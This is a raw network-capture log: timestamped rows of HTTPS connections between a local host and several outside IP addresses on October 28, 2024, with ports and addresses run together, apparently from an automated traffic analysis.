                                                                                                                                                Oct 28, 2024 17:49:16.236392021 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236438036 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236459970 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.236469984 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236481905 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236511946 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.236526012 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236556053 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236567974 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.236581087 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.236619949 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.237090111 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.237138033 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.237164021 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.237184048 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.237194061 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.237241030 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.237250090 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238074064 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238101006 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238131046 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.238152027 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238193035 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.238600969 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238850117 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238876104 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238894939 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.238907099 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.238950014 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.239569902 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.283773899 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.317037106 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.317065001 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.317161083 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.317188978 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.317241907 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.319055080 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.319075108 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.319144964 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.319152117 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.319196939 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.352730036 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.352780104 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.352804899 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.352828026 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.352844954 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.352893114 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.352941990 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.352999926 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.353040934 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.353049994 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.353081942 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.353131056 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.353394985 CET49794443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.353411913 CET44349794104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.368042946 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.368088961 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.368252039 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.368412971 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.368429899 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435240984 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435306072 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435345888 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.435379028 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435398102 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.435430050 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.435596943 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435659885 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.435667992 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435781956 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.435832024 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.436013937 CET49793443192.168.2.16151.101.66.137
                                                                                                                                                Oct 28, 2024 17:49:16.436033010 CET44349793151.101.66.137192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.703609943 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.703967094 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.704015970 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.704504013 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.704926968 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.705025911 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.705094099 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.747369051 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844345093 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844479084 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844551086 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.844594002 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844706059 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844765902 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.844783068 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844842911 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844891071 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844894886 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.844913006 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844953060 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.844959974 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.844974041 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.845025063 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.961009026 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961206913 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961303949 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961369991 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.961405993 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961452007 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.961462021 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961855888 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.961909056 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.961916924 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962008953 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962053061 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.962059975 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962692976 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962748051 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.962766886 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962862968 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.962913036 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.962924004 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.963392973 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.963454008 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.963468075 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.963562965 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.963608027 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.963617086 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.964334965 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.964400053 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.964416981 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.964494944 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.964541912 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:16.964555025 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.966285944 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.966543913 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.966573000 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.967572927 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.967639923 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.967946053 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.968019009 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.968080997 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:16.968091011 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.015794039 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.015799046 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:17.297110081 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297301054 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297390938 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297420979 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:17.297477961 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297508955 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297538042 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:17.297729015 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.297785997 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:17.298084021 CET49795443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:49:17.298130989 CET44349795104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299185991 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299232006 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299267054 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299285889 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.299299955 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299340010 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.299346924 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299391985 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299428940 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299432039 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.299454927 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299499989 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.299505949 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299515963 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.299570084 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327198029 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327250004 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327296019 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327328920 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327347994 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327384949 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327413082 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327421904 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327440977 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327472925 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327478886 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327522039 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327557087 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327588081 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327640057 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327668905 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327701092 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327706099 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327737093 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327737093 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327778101 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327786922 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327862024 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327896118 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327903986 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327912092 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327961922 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.327967882 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.328459024 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.328497887 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.328558922 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.328937054 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.328949928 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341511965 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341583967 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.341603041 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341866970 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341898918 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341917038 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.341927052 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341958046 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.341967106 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.341974974 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.342025995 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.342029095 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.342077017 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.342181921 CET49796443192.168.2.16104.17.25.14
                                                                                                                                                Oct 28, 2024 17:49:17.342195034 CET44349796104.17.25.14192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.953954935 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.954343081 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.954368114 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.955919027 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.955996037 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.956321955 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.956404924 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.956475973 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:17.956485987 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.000886917 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.108375072 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.108722925 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.108813047 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.108877897 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.108903885 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.108947992 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.108956099 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.109066963 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.109111071 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.109118938 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.109594107 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.109649897 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.109657049 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.124279022 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.124327898 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.124411106 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.124664068 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.124682903 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.159724951 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.159746885 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.207736015 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.226773024 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.226974964 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227040052 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.227051020 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227139950 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227188110 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.227196932 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227816105 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227874994 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.227884054 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.227973938 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228022099 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.228030920 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228667974 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228724957 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.228734016 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228840113 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.228846073 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228877068 CET44349797104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.228903055 CET49797443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.231933117 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.231981993 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.232059002 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.232351065 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.232364893 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.733932972 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.734319925 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.734400034 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.734761953 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.735210896 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.735294104 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.735305071 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.779356956 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.780775070 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.845232010 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.845568895 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.845590115 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.845894098 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.846277952 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.846347094 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.846436977 CET49799443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.876966953 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877013922 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877049923 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877078056 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.877082109 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877123117 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877161980 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.877171040 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877226114 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.877242088 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877655029 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877679110 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877737999 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.877754927 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.877813101 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.887331963 CET44349799104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.992957115 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993026018 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993118048 CET49798443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:49:18.993186951 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993244886 CET44349798104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:18.993274927 CET44349798104.18.94.41192.168.2.16
